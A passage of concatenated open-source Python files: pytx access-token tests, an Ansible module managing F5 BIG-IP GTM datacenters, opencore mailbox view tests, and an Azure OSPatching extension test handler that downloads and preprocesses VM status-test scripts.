access_token.init()
def test_only_app_id(self):
with nested(
pytest.raises(pytxInitError),
patch('pytx.access_token._find_token_file', return_value=None)
):
access_token.init(app_id='app_id')
def test_only_app_secret(self):
with nested(
pytest.raises(pytxInitError),
patch('pytx.access_token._find_token_file', return_value=None)
):
access_token.init(app_secret='app_secret')
def test_app_id_and_secret(self):
expected_token = 'app_id|app_secret'
with patch('pytx.access_token._find_token_file', return_value=None):
access_token.init(app_id='app_id', app_secret='app_secret')
self.verify_token(expected_token)
def test_implicit_token_file(self):
expected_token = 'app_id|app_secret'
file_contents = 'app_id|app_secret'
with nested(
patch('pytx.access_token._find_token_file', return_value='/foobar/mocked/away'),
patch('pytx.access_token._read_token_file', return_value=file_contents)
):
access_token.init(token_file='/foobar/mocked/away')
self.verify_token(expected_token)
def test_explicit_token_file(self):
expected_token = 'app_id|app_secret'
file_contents = 'app_id|app_secret'
with nested(
patch('pytx.access_token._find_token_file', return_value=None),
patch('pytx.access_token._read_token_file', return_value=file_contents)
):
access_token.init(token_file='/foobar/mocked/away')
self.verify_token(expected_token)
def test_single_env_var(self, monkeypatch):
expected_token = 'app_id|app_secret'
monkeypatch.setenv(te.TX_ACCESS_TOKEN, expected_token)
access_token.init()
self.verify_token(expected_token)
def test_double_env_var(self, monkeypatch):
expected_token = 'app_id|app_secret'
monkeypatch.setenv(te.TX_APP_ID, 'app_id')
monkeypatch.setenv(te.TX_APP_SECRET, 'app_secret')
access_token.init()
self.verify_token(expected_token)
| bsd-3-clause |
ATIX-AG/ansible | lib/ansible/modules/network/f5/bigip_gtm_datacenter.py | 27 | 13431 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: bigip_gtm_datacenter
short_description: Manage Datacenter configuration in BIG-IP
description:
- Manage BIG-IP data center configuration. A data center defines the location
where the physical network components reside, such as the server and link
objects that share the same subnet on the network. This module is able to
manipulate the data center definitions in a BIG-IP.
version_added: "2.2"
options:
contact:
description:
- The name of the contact for the data center.
description:
description:
- The description of the data center.
location:
description:
- The location of the data center.
name:
description:
- The name of the data center.
required: True
state:
description:
- The virtual address state. If C(absent), an attempt to delete the
virtual address will be made. This will only succeed if this
virtual address is not in use by a virtual server. C(present) creates
the virtual address and enables it. If C(enabled), enable the virtual
address if it exists. If C(disabled), create the virtual address if
needed, and set state to C(disabled).
default: present
choices:
- present
- absent
- enabled
- disabled
partition:
description:
- Device partition to manage resources on.
default: Common
version_added: 2.5
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
'''
EXAMPLES = r'''
- name: Create data center "New York"
bigip_gtm_datacenter:
server: lb.mydomain.com
user: admin
password: secret
name: New York
location: 222 West 23rd
delegate_to: localhost
'''
RETURN = r'''
contact:
description: The contact that was set on the datacenter.
returned: changed
type: string
sample: admin@root.local
description:
description: The description that was set for the datacenter.
returned: changed
type: string
sample: Datacenter in NYC
enabled:
description: Whether the datacenter is enabled or not
returned: changed
type: bool
sample: true
disabled:
description: Whether the datacenter is disabled or not.
returned: changed
type: bool
sample: true
state:
description: State of the datacenter.
returned: changed
type: string
sample: disabled
location:
description: The location that is set for the datacenter.
returned: changed
type: string
sample: 222 West 23rd
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
HAS_DEVEL_IMPORTS = False
try:
# Sideband repository used for dev
from library.module_utils.network.f5.bigip import HAS_F5SDK
from library.module_utils.network.f5.bigip import F5Client
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fqdn_name
from library.module_utils.network.f5.common import f5_argument_spec
try:
from library.module_utils.network.f5.common import iControlUnexpectedHTTPError
except ImportError:
HAS_F5SDK = False
HAS_DEVEL_IMPORTS = True
except ImportError:
# Upstream Ansible
from ansible.module_utils.network.f5.bigip import HAS_F5SDK
from ansible.module_utils.network.f5.bigip import F5Client
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fqdn_name
from ansible.module_utils.network.f5.common import f5_argument_spec
try:
from ansible.module_utils.network.f5.common import iControlUnexpectedHTTPError
except ImportError:
HAS_F5SDK = False
class Parameters(AnsibleF5Parameters):
api_map = {}
updatables = [
'location', 'description', 'contact', 'state'
]
returnables = [
'location', 'description', 'contact', 'state', 'enabled', 'disabled'
]
api_attributes = [
'enabled', 'location', 'description', 'contact', 'disabled'
]
def to_return(self):
result = {}
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
return result
def api_params(self):
result = {}
for api_attribute in self.api_attributes:
if api_attribute in self.api_map:
result[api_attribute] = getattr(
self, self.api_map[api_attribute])
else:
result[api_attribute] = getattr(self, api_attribute)
result = self._filter_params(result)
return result
class ApiParameters(Parameters):
@property
def disabled(self):
if self._values['disabled'] is True:
return True
return None
@property
def enabled(self):
if self._values['enabled'] is True:
return True
return None
class ModuleParameters(Parameters):
@property
def disabled(self):
if self._values['state'] == 'disabled':
return True
else:
return None
@property
def enabled(self):
if self._values['state'] in ['enabled', 'present']:
return True
return None
@property
def state(self):
if self.enabled and self._values['state'] != 'present':
return 'enabled'
elif self.disabled and self._values['state'] != 'present':
return 'disabled'
else:
return self._values['state']
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
pass
class ReportableChanges(Changes):
@property
def disabled(self):
if self._values['state'] == 'disabled':
return True
elif self._values['state'] in ['enabled', 'present']:
return False
return None
@property
def enabled(self):
if self._values['state'] in ['enabled', 'present']:
return True
elif self._values['state'] == 'disabled':
return False
return None
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def state(self):
if self.want.enabled != self.have.enabled:
return dict(
state=self.want.state,
enabled=self.want.enabled
)
if self.want.disabled != self.have.disabled:
return dict(
state=self.want.state,
disabled=self.want.disabled
)
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.pop('module', None)
self.client = kwargs.pop('client', None)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
def exec_module(self):
changed = False
result = dict()
state = self.want.state
try:
if state in ['present', 'enabled', 'disabled']:
changed = self.present()
elif state == "absent":
changed = self.absent()
except iControlUnexpectedHTTPError as e:
raise F5ModuleError(str(e))
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def absent(self):
changed = False
if self.exists():
changed = self.remove()
return changed
def read_current_from_device(self):
resource = self.client.api.tm.gtm.datacenters.datacenter.load(
name=self.want.name,
partition=self.want.partition
)
result = resource.attrs
return ApiParameters(params=result)
def exists(self):
result = self.client.api.tm.gtm.datacenters.datacenter.exists(
name=self.want.name,
partition=self.want.partition
)
return result
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def update_on_device(self):
params = self.want.api_params()
resource = self.client.api.tm.gtm.datacenters.datacenter.load(
name=self.want.name,
partition=self.want.partition
)
resource.modify(**params)
def create(self):
self.have = ApiParameters()
self.should_update()
if self.module.check_mode:
return True
self.create_on_device()
if self.exists():
return True
else:
raise F5ModuleError("Failed to create the datacenter")
def create_on_device(self):
params = self.want.api_params()
self.client.api.tm.gtm.datacenters.datacenter.create(
name=self.want.name,
partition=self.want.partition,
**params
)
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the datacenter")
return True
def remove_from_device(self):
resource = self.client.api.tm.gtm.datacenters.datacenter.load(
name=self.want.name,
partition=self.want.partition
)
resource.delete()
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
contact=dict(),
description=dict(),
location=dict(),
name=dict(required=True),
state=dict(
default='present',
choices=['present', 'absent', 'disabled', 'enabled']
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode
)
if not HAS_F5SDK:
module.fail_json(msg="The python f5-sdk module is required")
try:
client = F5Client(**module.params)
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
module.exit_json(**results)
except F5ModuleError as ex:
cleanup_tokens(client)
module.fail_json(msg=str(ex))
if __name__ == '__main__':
main()
| gpl-3.0 |
damilare/opencore | opencore/views/tests/test_mbox.py | 4 | 12472 | # Copyright (C) 2008-2009 Open Society Institute
# Thomas Moroz: tmoroz.org
# 2010-2011 Large Blue
# Fergus Doyle: fergus.doyle@largeblue.com
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License Version 2 as published
# by the Free Software Foundation. You may not use, modify or distribute
# this program under any other version of the GNU General Public License.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# stdlib
from datetime import datetime
import unittest, uuid
from urllib import urlencode
# Zope
import transaction
# webob
from webob import Response
from webob.multidict import MultiDict
# Repoze
from repoze.bfg.testing import (
DummyModel,
DummyRequest,
cleanUp,
registerUtility,
)
from repoze.folder import Folder
# testfixtures
from testfixtures import LogCapture
from testfixtures import Replacer
# simplejson
from simplejson import JSONDecoder
# opencore
from opencore.models.adapters import ProfileDict
from opencore.models.interfaces import IProfileDict
from opencore.scripting import get_default_config
from opencore.scripting import open_root
from opencore.utilities.mbox import MailboxTool
from opencore.utilities.mbox import MboxMessage
from opencore.utilities.mbox import NoSuchThreadException
from opencore.utilities.tests.test_mbox import get_data
from opencore.utils import find_profiles
from opencore.views.api import get_template_api
from opencore.views.mbox import _format_date
from opencore.views.mbox import _get_mbox_type
from opencore.views.mbox import _json_response
from opencore.views.mbox import DEFAULT_MBOX_TYPE
from opencore.views.mbox import PER_PAGE
from opencore.views.mbox import add_message
from opencore.views.mbox import delete_message
from opencore.views.mbox import mark_message_read
from opencore.views.mbox import show_mbox
from opencore.views.mbox import show_mbox_thread
from opencore.testing import (
DummyUsers,
DummyProfile,
)
from opencore.views.tests import (
DummyAPI,
)
def _authenticated_user_id(request):
return 'admin'
class MBoxViewTestCase(unittest.TestCase):
def setUp(self):
self.mbt = MailboxTool()
self.log = LogCapture()
self.context = DummyModel()
self.context['mailboxes'] = DummyModel()
self.context.users = DummyUsers()
self.bob = DummyProfile()
self.bob.__name__ = 'bob'
self.alice = DummyProfile()
self.alice.__name__ = 'alice'
def tearDown(self):
cleanUp()
def _get_mbox_request(self, mbox_type, key='mbox_type'):
request = DummyRequest()
request.params[key] = mbox_type
return request
def test_per_page(self):
self.assertEquals(PER_PAGE, 20)
def test_json_response(self):
success = uuid.uuid4().hex
error_msg = uuid.uuid4().hex
response = _json_response(success, error_msg)
self.assertTrue(isinstance(response, Response))
self.assertEquals(response.content_type, 'application/x-json')
given_body = sorted(JSONDecoder().decode(response.body).items())
expected_body = [('error_msg', error_msg), ('success', success)]
self.assertEquals(given_body, expected_body)
def test_get_mbox_type(self):
mbox_type = _get_mbox_type(self._get_mbox_request('inbox'))
self.assertEquals(mbox_type, 'inbox')
mbox_type = _get_mbox_type(self._get_mbox_request('sent'))
self.assertEquals(mbox_type, 'sent')
# Unrecognized mbox type, should revert to default inbox.
mbox_type = _get_mbox_type(self._get_mbox_request(uuid.uuid4().hex))
self.assertEquals(mbox_type, DEFAULT_MBOX_TYPE)
# Unrecognized key, should revert to default inbox.
mbox_type = _get_mbox_type(self._get_mbox_request('inbox', key=uuid.uuid4().hex))
self.assertEquals(mbox_type, DEFAULT_MBOX_TYPE)
def test_show_mbox(self):
_people_url = uuid.uuid4().hex
_firstname = uuid.uuid4().hex
_lastname = uuid.uuid4().hex
_country = uuid.uuid4().hex
class _DummyAPI(object):
static_url = '/foo/bar'
def find_profile(*ignored_args, **ignored_kwargs):
class _Dummy(object):
firstname = _firstname
lastname = _lastname
country = _country
organization = uuid.uuid4().hex
thumb_url = lambda _profile, _request: '/test-thumb.jpg'
return _Dummy()
people_url = _people_url
with Replacer() as r:
r.replace('opencore.views.mbox.authenticated_userid', _authenticated_user_id)
r.replace('opencore.views.mbox._get_profile_details',
lambda context, request, user: {})
site, from_, _, msg, thread_id, _, _, _, payload, _ = get_data()
to = find_profiles(site)['admin']
self.mbt.send_message(site, from_, to, msg, should_commit=True)
site, _ = open_root(get_default_config())
request = DummyRequest()
request.params['thread_id'] = thread_id
request.api = _DummyAPI()
response = show_mbox_thread(site, request)
self.assertTrue(isinstance(response['api'], _DummyAPI))
self.assertTrue(len(response['messages']), 1)
message = response['messages'][0]
flags = message['flags']
if flags:
self.assertEquals(flags, ['READ'])
self.assertEquals(message['from'], 'admin')
self.assertEquals(message['from_country'], _country)
self.assertEquals(message['from_firstname'], _firstname)
self.assertEquals(message['from_lastname'], _lastname)
self.assertEquals(message['from_photo'], '/test-thumb.jpg')
self.assertEquals(message['payload'], payload)
self.assertTrue(len(message['payload']) > 20)
self.assertTrue(len(message['queue_id']) > 20)
self.assertTrue(len(message['to_data']) == 2)
to_data = message['to_data']
for to_datum in to_data:
self.assertEquals(to_datum['country'], _country)
self.assertEquals(to_datum['firstname'], _firstname)
self.assertEquals(to_datum['lastname'], _lastname)
name = to_datum['name']
self.assertTrue(name in ('joe', 'sarah'))
self.assertEquals(to_datum['photo_url'], '/test-thumb.jpg')
def test_add_message(self):
subject = uuid.uuid4().hex
payload = uuid.uuid4().hex
site, _ = open_root(get_default_config())
to = find_profiles(site)['sarah']
with Replacer() as r:
r.replace('opencore.views.mbox.authenticated_userid', _authenticated_user_id)
r.replace('opencore.views.mbox._get_profile_details',
lambda context, request, user: {})
request = DummyRequest(method='POST')
request.api = DummyAPI()
request.api.find_profile = (lambda userid:
self.bob if userid == 'bob' else self.alice)
request.POST = MultiDict([
('to[]', 'bob'),
('subject', subject),
('payload', payload),
])
response = add_message(site, request)
self.assertTrue("mbox_thread" in response.location)
transaction.commit()
def test_add_message_multiple_recipients(self):
subject = uuid.uuid4().hex
payload = uuid.uuid4().hex
with Replacer() as r:
r.replace('opencore.views.mbox.authenticated_userid', _authenticated_user_id)
r.replace('opencore.views.mbox._get_profile_details',
lambda context, request, user: {})
request = DummyRequest(method='POST')
request.POST = MultiDict([
('to[]', 'bob'),
('to[]', 'alice'),
('subject', subject),
('payload', payload),
])
request.api = DummyAPI()
request.api.find_profile = (lambda userid:
self.bob if userid == 'bob' else self.alice)
response = add_message(self.context, request)
# Mailboxes have been created
self.assertTrue('bob.inbox' in self.context['mailboxes'])
self.assertTrue('alice.inbox' in self.context['mailboxes'])
# Queues have been created
bob_inbox = self.context['mailboxes']['bob.inbox']
alice_inbox = self.context['mailboxes']['alice.inbox']
self.assertEquals(len(bob_inbox), 1)
self.assertEquals(len(alice_inbox), 1)
# Redirect to new message
self.assertEquals(
'http://example.com/mbox_thread.html?'
+ urlencode({'thread_id': alice_inbox[0].id})
+ '#last-message',
response.location)
r.restore()
transaction.commit()
def test_delete_message(self):
api = uuid.uuid4().hex
with Replacer() as r:
r.replace('opencore.views.mbox.authenticated_userid', _authenticated_user_id)
site, from_, _, msg, thread_id, msg_id, _, _, _, _ = get_data()
to = find_profiles(site)['admin']
self.mbt.send_message(site, from_, to, msg, should_commit=True)
request = DummyRequest()
request.api = api
request.params['thread_id'] = thread_id
request.params['message_id'] = msg_id
delete_message(site, request)
transaction.commit()
try:
raw_msg, msg = self.mbt.get_message(site, from_, 'inbox', thread_id, msg_id)
except NoSuchThreadException:
pass
else:
raise Exception('Expected a NoSuchThreadException here')
def test_mark_message_read(self):
api = uuid.uuid4().hex
with Replacer() as r:
r.replace('opencore.views.mbox.authenticated_userid', _authenticated_user_id)
site, from_, _, msg, thread_id, msg_id, _, _, _, _ = get_data()
to = find_profiles(site)['admin']
self.mbt.send_message(site, from_, to, msg, should_commit=True)
request = DummyRequest()
request.api = api
request.params['thread_id'] = thread_id
request.params['message_id'] = msg_id
mark_message_read(site, request)
transaction.commit()
raw_msg, msg = self.mbt.get_message(site, from_, 'inbox', thread_id, msg_id)
self.assertEquals(raw_msg.flags, ['READ'])
def test_get_unread(self):
api = uuid.uuid4().hex
user_name = 'admin'
with Replacer() as r:
r.replace('opencore.views.mbox.authenticated_userid', _authenticated_user_id)
site, from_, _, msg, thread_id, msg_id, _, _, _, _ = get_data()
to = find_profiles(site)[user_name]
self.mbt.send_message(site, from_, to, msg, should_commit=True)
request = DummyRequest()
request.api = api
request.params['thread_id'] = thread_id
request.params['message_id'] = msg_id
mark_message_read(site, request)
transaction.commit()
self.mbt.send_message(site, from_, to, msg, should_commit=True)
transaction.commit()
unread = self.mbt.get_unread(site, user_name)
self.assertTrue(unread >= 0)
def test_format_date(self):
orig = '2011-05-31 13:59:50'
expected = '31 May at 13:59'
site, from_, _, msg, thread_id, msg_id, _, _, _, _ = get_data()
given = _format_date(site, orig)
self.assertEquals(expected, given)
| gpl-2.0 |
krkhan/azure-linux-extensions | OSPatching/test/test_handler_3.py | 8 | 22200 | #!/usr/bin/python
#
# OSPatching extension
#
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import re
import time
import chardet
import tempfile
import urllib2
import urlparse
import shutil
import traceback
import logging
from azure.storage import BlobService
from Utils.WAAgentUtil import waagent
import Utils.HandlerUtil as Util
import json
import unittest
from patch import *
from FakePatching3 import FakePatching
sys.path.append('..')
# Global variables definition
ExtensionShortName = 'OSPatching'
DownloadDirectory = 'download'
idleTestScriptName = "idleTest.py"
healthyTestScriptName = "healthyTest.py"
handlerName = os.path.basename(sys.argv[0])
status_file = './status/0.status'
log_file = './extension.log'
settings_file = "default.settings"
with open(settings_file, "r") as f:
settings_string = f.read()
settings = json.loads(settings_string)
def install():
hutil.do_parse_context('Install')
try:
MyPatching.install()
hutil.do_exit(0, 'Install', 'success', '0', 'Install Succeeded.')
except Exception as e:
hutil.log_and_syslog(logging.ERROR, "Failed to install the extension with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Install', 'error', '0', 'Install Failed.')
def enable():
hutil.do_parse_context('Enable')
try:
MyPatching.parse_settings(settings)
# Ensure the same configuration is executed only once
hutil.exit_if_seq_smaller()
oneoff = settings.get("oneoff")
download_customized_vmstatustest()
copy_vmstatustestscript(hutil.get_seq_no(), oneoff)
MyPatching.enable()
current_config = MyPatching.get_current_config()
hutil.do_exit(0, 'Enable', 'success', '0', 'Enable Succeeded. Current Configuration: ' + current_config)
except Exception as e:
current_config = MyPatching.get_current_config()
hutil.log_and_syslog(logging.ERROR, "Failed to enable the extension with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Enable', 'error', '0', 'Enable Failed. Current Configuation: ' + current_config)
def uninstall():
hutil.do_parse_context('Uninstall')
hutil.do_exit(0, 'Uninstall', 'success', '0', 'Uninstall Succeeded.')
def disable():
hutil.do_parse_context('Disable')
try:
# Ensure the same configuration is executed only once
hutil.exit_if_seq_smaller()
MyPatching.disable()
hutil.do_exit(0, 'Disable', 'success', '0', 'Disable Succeeded.')
except Exception as e:
hutil.log_and_syslog(logging.ERROR, "Failed to disable the extension with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Disable', 'error', '0', 'Disable Failed.')
def update():
hutil.do_parse_context('Upadate')
hutil.do_exit(0, 'Update', 'success', '0', 'Update Succeeded.')
def download():
hutil.do_parse_context('Download')
try:
MyPatching.parse_settings(settings)
MyPatching.download()
current_config = MyPatching.get_current_config()
hutil.do_exit(0,'Enable','success','0', 'Download Succeeded. Current Configuation: ' + current_config)
except Exception as e:
current_config = MyPatching.get_current_config()
hutil.log_and_syslog(logging.ERROR, "Failed to download updates with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Enable','error','0', 'Download Failed. Current Configuation: ' + current_config)
def patch():
hutil.do_parse_context('Patch')
try:
MyPatching.parse_settings(settings)
MyPatching.patch()
current_config = MyPatching.get_current_config()
hutil.do_exit(0,'Enable','success','0', 'Patch Succeeded. Current Configuation: ' + current_config)
except Exception as e:
current_config = MyPatching.get_current_config()
hutil.log_and_syslog(logging.ERROR, "Failed to patch with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Enable','error','0', 'Patch Failed. Current Configuation: ' + current_config)
def oneoff():
hutil.do_parse_context('Oneoff')
try:
MyPatching.parse_settings(settings)
MyPatching.patch_one_off()
current_config = MyPatching.get_current_config()
hutil.do_exit(0,'Enable','success','0', 'Oneoff Patch Succeeded. Current Configuation: ' + current_config)
except Exception as e:
current_config = MyPatching.get_current_config()
hutil.log_and_syslog(logging.ERROR, "Failed to one-off patch with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Enable','error','0', 'Oneoff Patch Failed. Current Configuation: ' + current_config)
def download_files(hutil):
local = settings.get("vmStatusTest", dict()).get("local", "")
if local.lower() == "true":
local = True
elif local.lower() == "false":
local = False
else:
hutil.log_and_syslog(logging.WARNING, "The parameter \"local\" "
"is empty or invalid. Set it as False. Continue...")
local = False
idle_test_script = settings.get("vmStatusTest", dict()).get('idleTestScript')
healthy_test_script = settings.get("vmStatusTest", dict()).get('healthyTestScript')
if (not idle_test_script and not healthy_test_script):
hutil.log_and_syslog(logging.WARNING, "The parameter \"idleTestScript\" and \"healthyTestScript\" "
"are both empty. Exit downloading VMStatusTest scripts...")
return
elif local:
if (idle_test_script and idle_test_script.startswith("http")) or \
(healthy_test_script and healthy_test_script.startswith("http")):
hutil.log_and_syslog(logging.WARNING, "The parameter \"idleTestScript\" or \"healthyTestScript\" "
"should not be uri. Exit downloading VMStatusTest scripts...")
return
elif not local:
if (idle_test_script and not idle_test_script.startswith("http")) or \
(healthy_test_script and not healthy_test_script.startswith("http")):
hutil.log_and_syslog(logging.WARNING, "The parameter \"idleTestScript\" or \"healthyTestScript\" "
"should be uri. Exit downloading VMStatusTest scripts...")
return
hutil.do_status_report('Downloading','transitioning', '0',
'Downloading VMStatusTest scripts...')
vmStatusTestScripts = dict()
vmStatusTestScripts[idle_test_script] = idleTestScriptName
vmStatusTestScripts[healthy_test_script] = healthyTestScriptName
if local:
hutil.log_and_syslog(logging.INFO, "Saving VMStatusTest scripts from user's configurations...")
for src,dst in vmStatusTestScripts.items():
if not src:
continue
file_path = save_local_file(src, dst, hutil)
preprocess_files(file_path, hutil)
return
storage_account_name = None
storage_account_key = None
if settings:
storage_account_name = settings.get("storageAccountName", "").strip()
storage_account_key = settings.get("storageAccountKey", "").strip()
if storage_account_name and storage_account_key:
hutil.log_and_syslog(logging.INFO, "Downloading VMStatusTest scripts from azure storage...")
for src,dst in vmStatusTestScripts.items():
if not src:
continue
file_path = download_blob(storage_account_name,
storage_account_key,
src,
dst,
hutil)
preprocess_files(file_path, hutil)
elif not(storage_account_name or storage_account_key):
hutil.log_and_syslog(logging.INFO, "No azure storage account and key specified in protected "
"settings. Downloading VMStatusTest scripts from external links...")
for src,dst in vmStatusTestScripts.items():
if not src:
continue
file_path = download_external_file(src, dst, hutil)
preprocess_files(file_path, hutil)
else:
#Storage account and key should appear in pairs
error_msg = "Azure storage account or storage key is not provided"
hutil.log_and_syslog(logging.ERROR, error_msg)
raise ValueError(error_msg)
def download_blob(storage_account_name, storage_account_key,
blob_uri, dst, hutil):
seqNo = hutil.get_seq_no()
container_name = get_container_name_from_uri(blob_uri)
blob_name = get_blob_name_from_uri(blob_uri)
download_dir = prepare_download_dir(seqNo)
download_path = os.path.join(download_dir, dst)
#Guest agent already ensure the plugin is enabled one after another.
#The blob download will not conflict.
blob_service = BlobService(storage_account_name, storage_account_key)
try:
blob_service.get_blob_to_path(container_name, blob_name, download_path)
except Exception as e:
hutil.log_and_syslog(logging.ERROR, ("Failed to download blob with uri:{0} "
"with error {1}").format(blob_uri,e))
raise
return download_path
def download_external_file(uri, dst, hutil):
seqNo = hutil.get_seq_no()
download_dir = prepare_download_dir(seqNo)
file_path = os.path.join(download_dir, dst)
try:
download_and_save_file(uri, file_path)
except Exception as e:
hutil.log_and_syslog(logging.ERROR, ("Failed to download external file with uri:{0} "
"with error {1}").format(uri, e))
raise
return file_path
def save_local_file(src, dst, hutil):
seqNo = hutil.get_seq_no()
download_dir = prepare_download_dir(seqNo)
file_path = os.path.join(download_dir, dst)
try:
waagent.SetFileContents(file_path, src)
except Exception as e:
hutil.log_and_syslog(logging.ERROR, ("Failed to save file from user's configuration "
"with error {0}").format(e))
raise
return file_path
def preprocess_files(file_path, hutil):
"""
Preprocess the text file. If it is a binary file, skip it.
"""
is_text, code_type = is_text_file(file_path)
if is_text:
dos2unix(file_path)
hutil.log_and_syslog(logging.INFO, "Converting text files from DOS to Unix formats: Done")
if code_type in ['UTF-8', 'UTF-16LE', 'UTF-16BE']:
remove_bom(file_path)
hutil.log_and_syslog(logging.INFO, "Removing BOM: Done")
def is_text_file(file_path):
with open(file_path, 'rb') as f:
contents = f.read(512)
return is_text(contents)
def is_text(contents):
supported_encoding = ['ascii', 'UTF-8', 'UTF-16LE', 'UTF-16BE']
code_type = chardet.detect(contents)['encoding']
if code_type in supported_encoding:
return True, code_type
else:
return False, code_type
def dos2unix(file_path):
temp_file_path = tempfile.mkstemp()[1]
f_temp = open(temp_file_path, 'wb')
with open(file_path, 'rU') as f:
contents = f.read()
f_temp.write(contents)
f_temp.close()
shutil.move(temp_file_path, file_path)
def remove_bom(file_path):
temp_file_path = tempfile.mkstemp()[1]
f_temp = open(temp_file_path, 'wb')
with open(file_path, 'rb') as f:
contents = f.read()
for encoding in ["utf-8-sig", "utf-16"]:
try:
f_temp.write(contents.decode(encoding).encode('utf-8'))
break
except UnicodeDecodeError:
continue
f_temp.close()
shutil.move(temp_file_path, file_path)
def download_and_save_file(uri, file_path):
src = urllib2.urlopen(uri)
dest = open(file_path, 'wb')
buf_size = 1024
buf = src.read(buf_size)
while(buf):
dest.write(buf)
buf = src.read(buf_size)
def prepare_download_dir(seqNo):
download_dir_main = os.path.join(os.getcwd(), DownloadDirectory)
create_directory_if_not_exists(download_dir_main)
download_dir = os.path.join(download_dir_main, seqNo)
create_directory_if_not_exists(download_dir)
return download_dir
def create_directory_if_not_exists(directory):
"""create directory if no exists"""
if not os.path.exists(directory):
os.makedirs(directory)
def get_path_from_uri(uriStr):
uri = urlparse.urlparse(uriStr)
return uri.path
def get_blob_name_from_uri(uri):
return get_properties_from_uri(uri)['blob_name']
def get_container_name_from_uri(uri):
return get_properties_from_uri(uri)['container_name']
def get_properties_from_uri(uri):
path = get_path_from_uri(uri)
if path.endswith('/'):
path = path[:-1]
if path[0] == '/':
path = path[1:]
first_sep = path.find('/')
if first_sep == -1:
hutil.log_and_syslog(logging.ERROR, "Failed to extract container, blob, from {}".format(path))
blob_name = path[first_sep+1:]
container_name = path[:first_sep]
return {'blob_name': blob_name, 'container_name': container_name}
def download_customized_vmstatustest():
maxRetry = 2
for retry in range(0, maxRetry + 1):
try:
download_files(hutil)
break
except Exception:
hutil.log_and_syslog(logging.ERROR, "Failed to download files, retry=" + str(retry) + ", maxRetry=" + str(maxRetry))
if retry != maxRetry:
hutil.log_and_syslog(logging.INFO, "Sleep 10 seconds")
time.sleep(10)
else:
raise
def copy_vmstatustestscript(seqNo, oneoff):
src_dir = prepare_download_dir(seqNo)
for filename in (idleTestScriptName, healthyTestScriptName):
src = os.path.join(src_dir, filename)
if os.path.isfile(src):
if oneoff is not None and oneoff.lower() == "true":
dst = "oneoff"
else:
dst = "scheduled"
dst = os.path.join(os.getcwd(), dst)
shutil.copy(src, dst)
def delete_current_vmstatustestscript():
for filename in (idleTestScriptName, healthyTestScriptName):
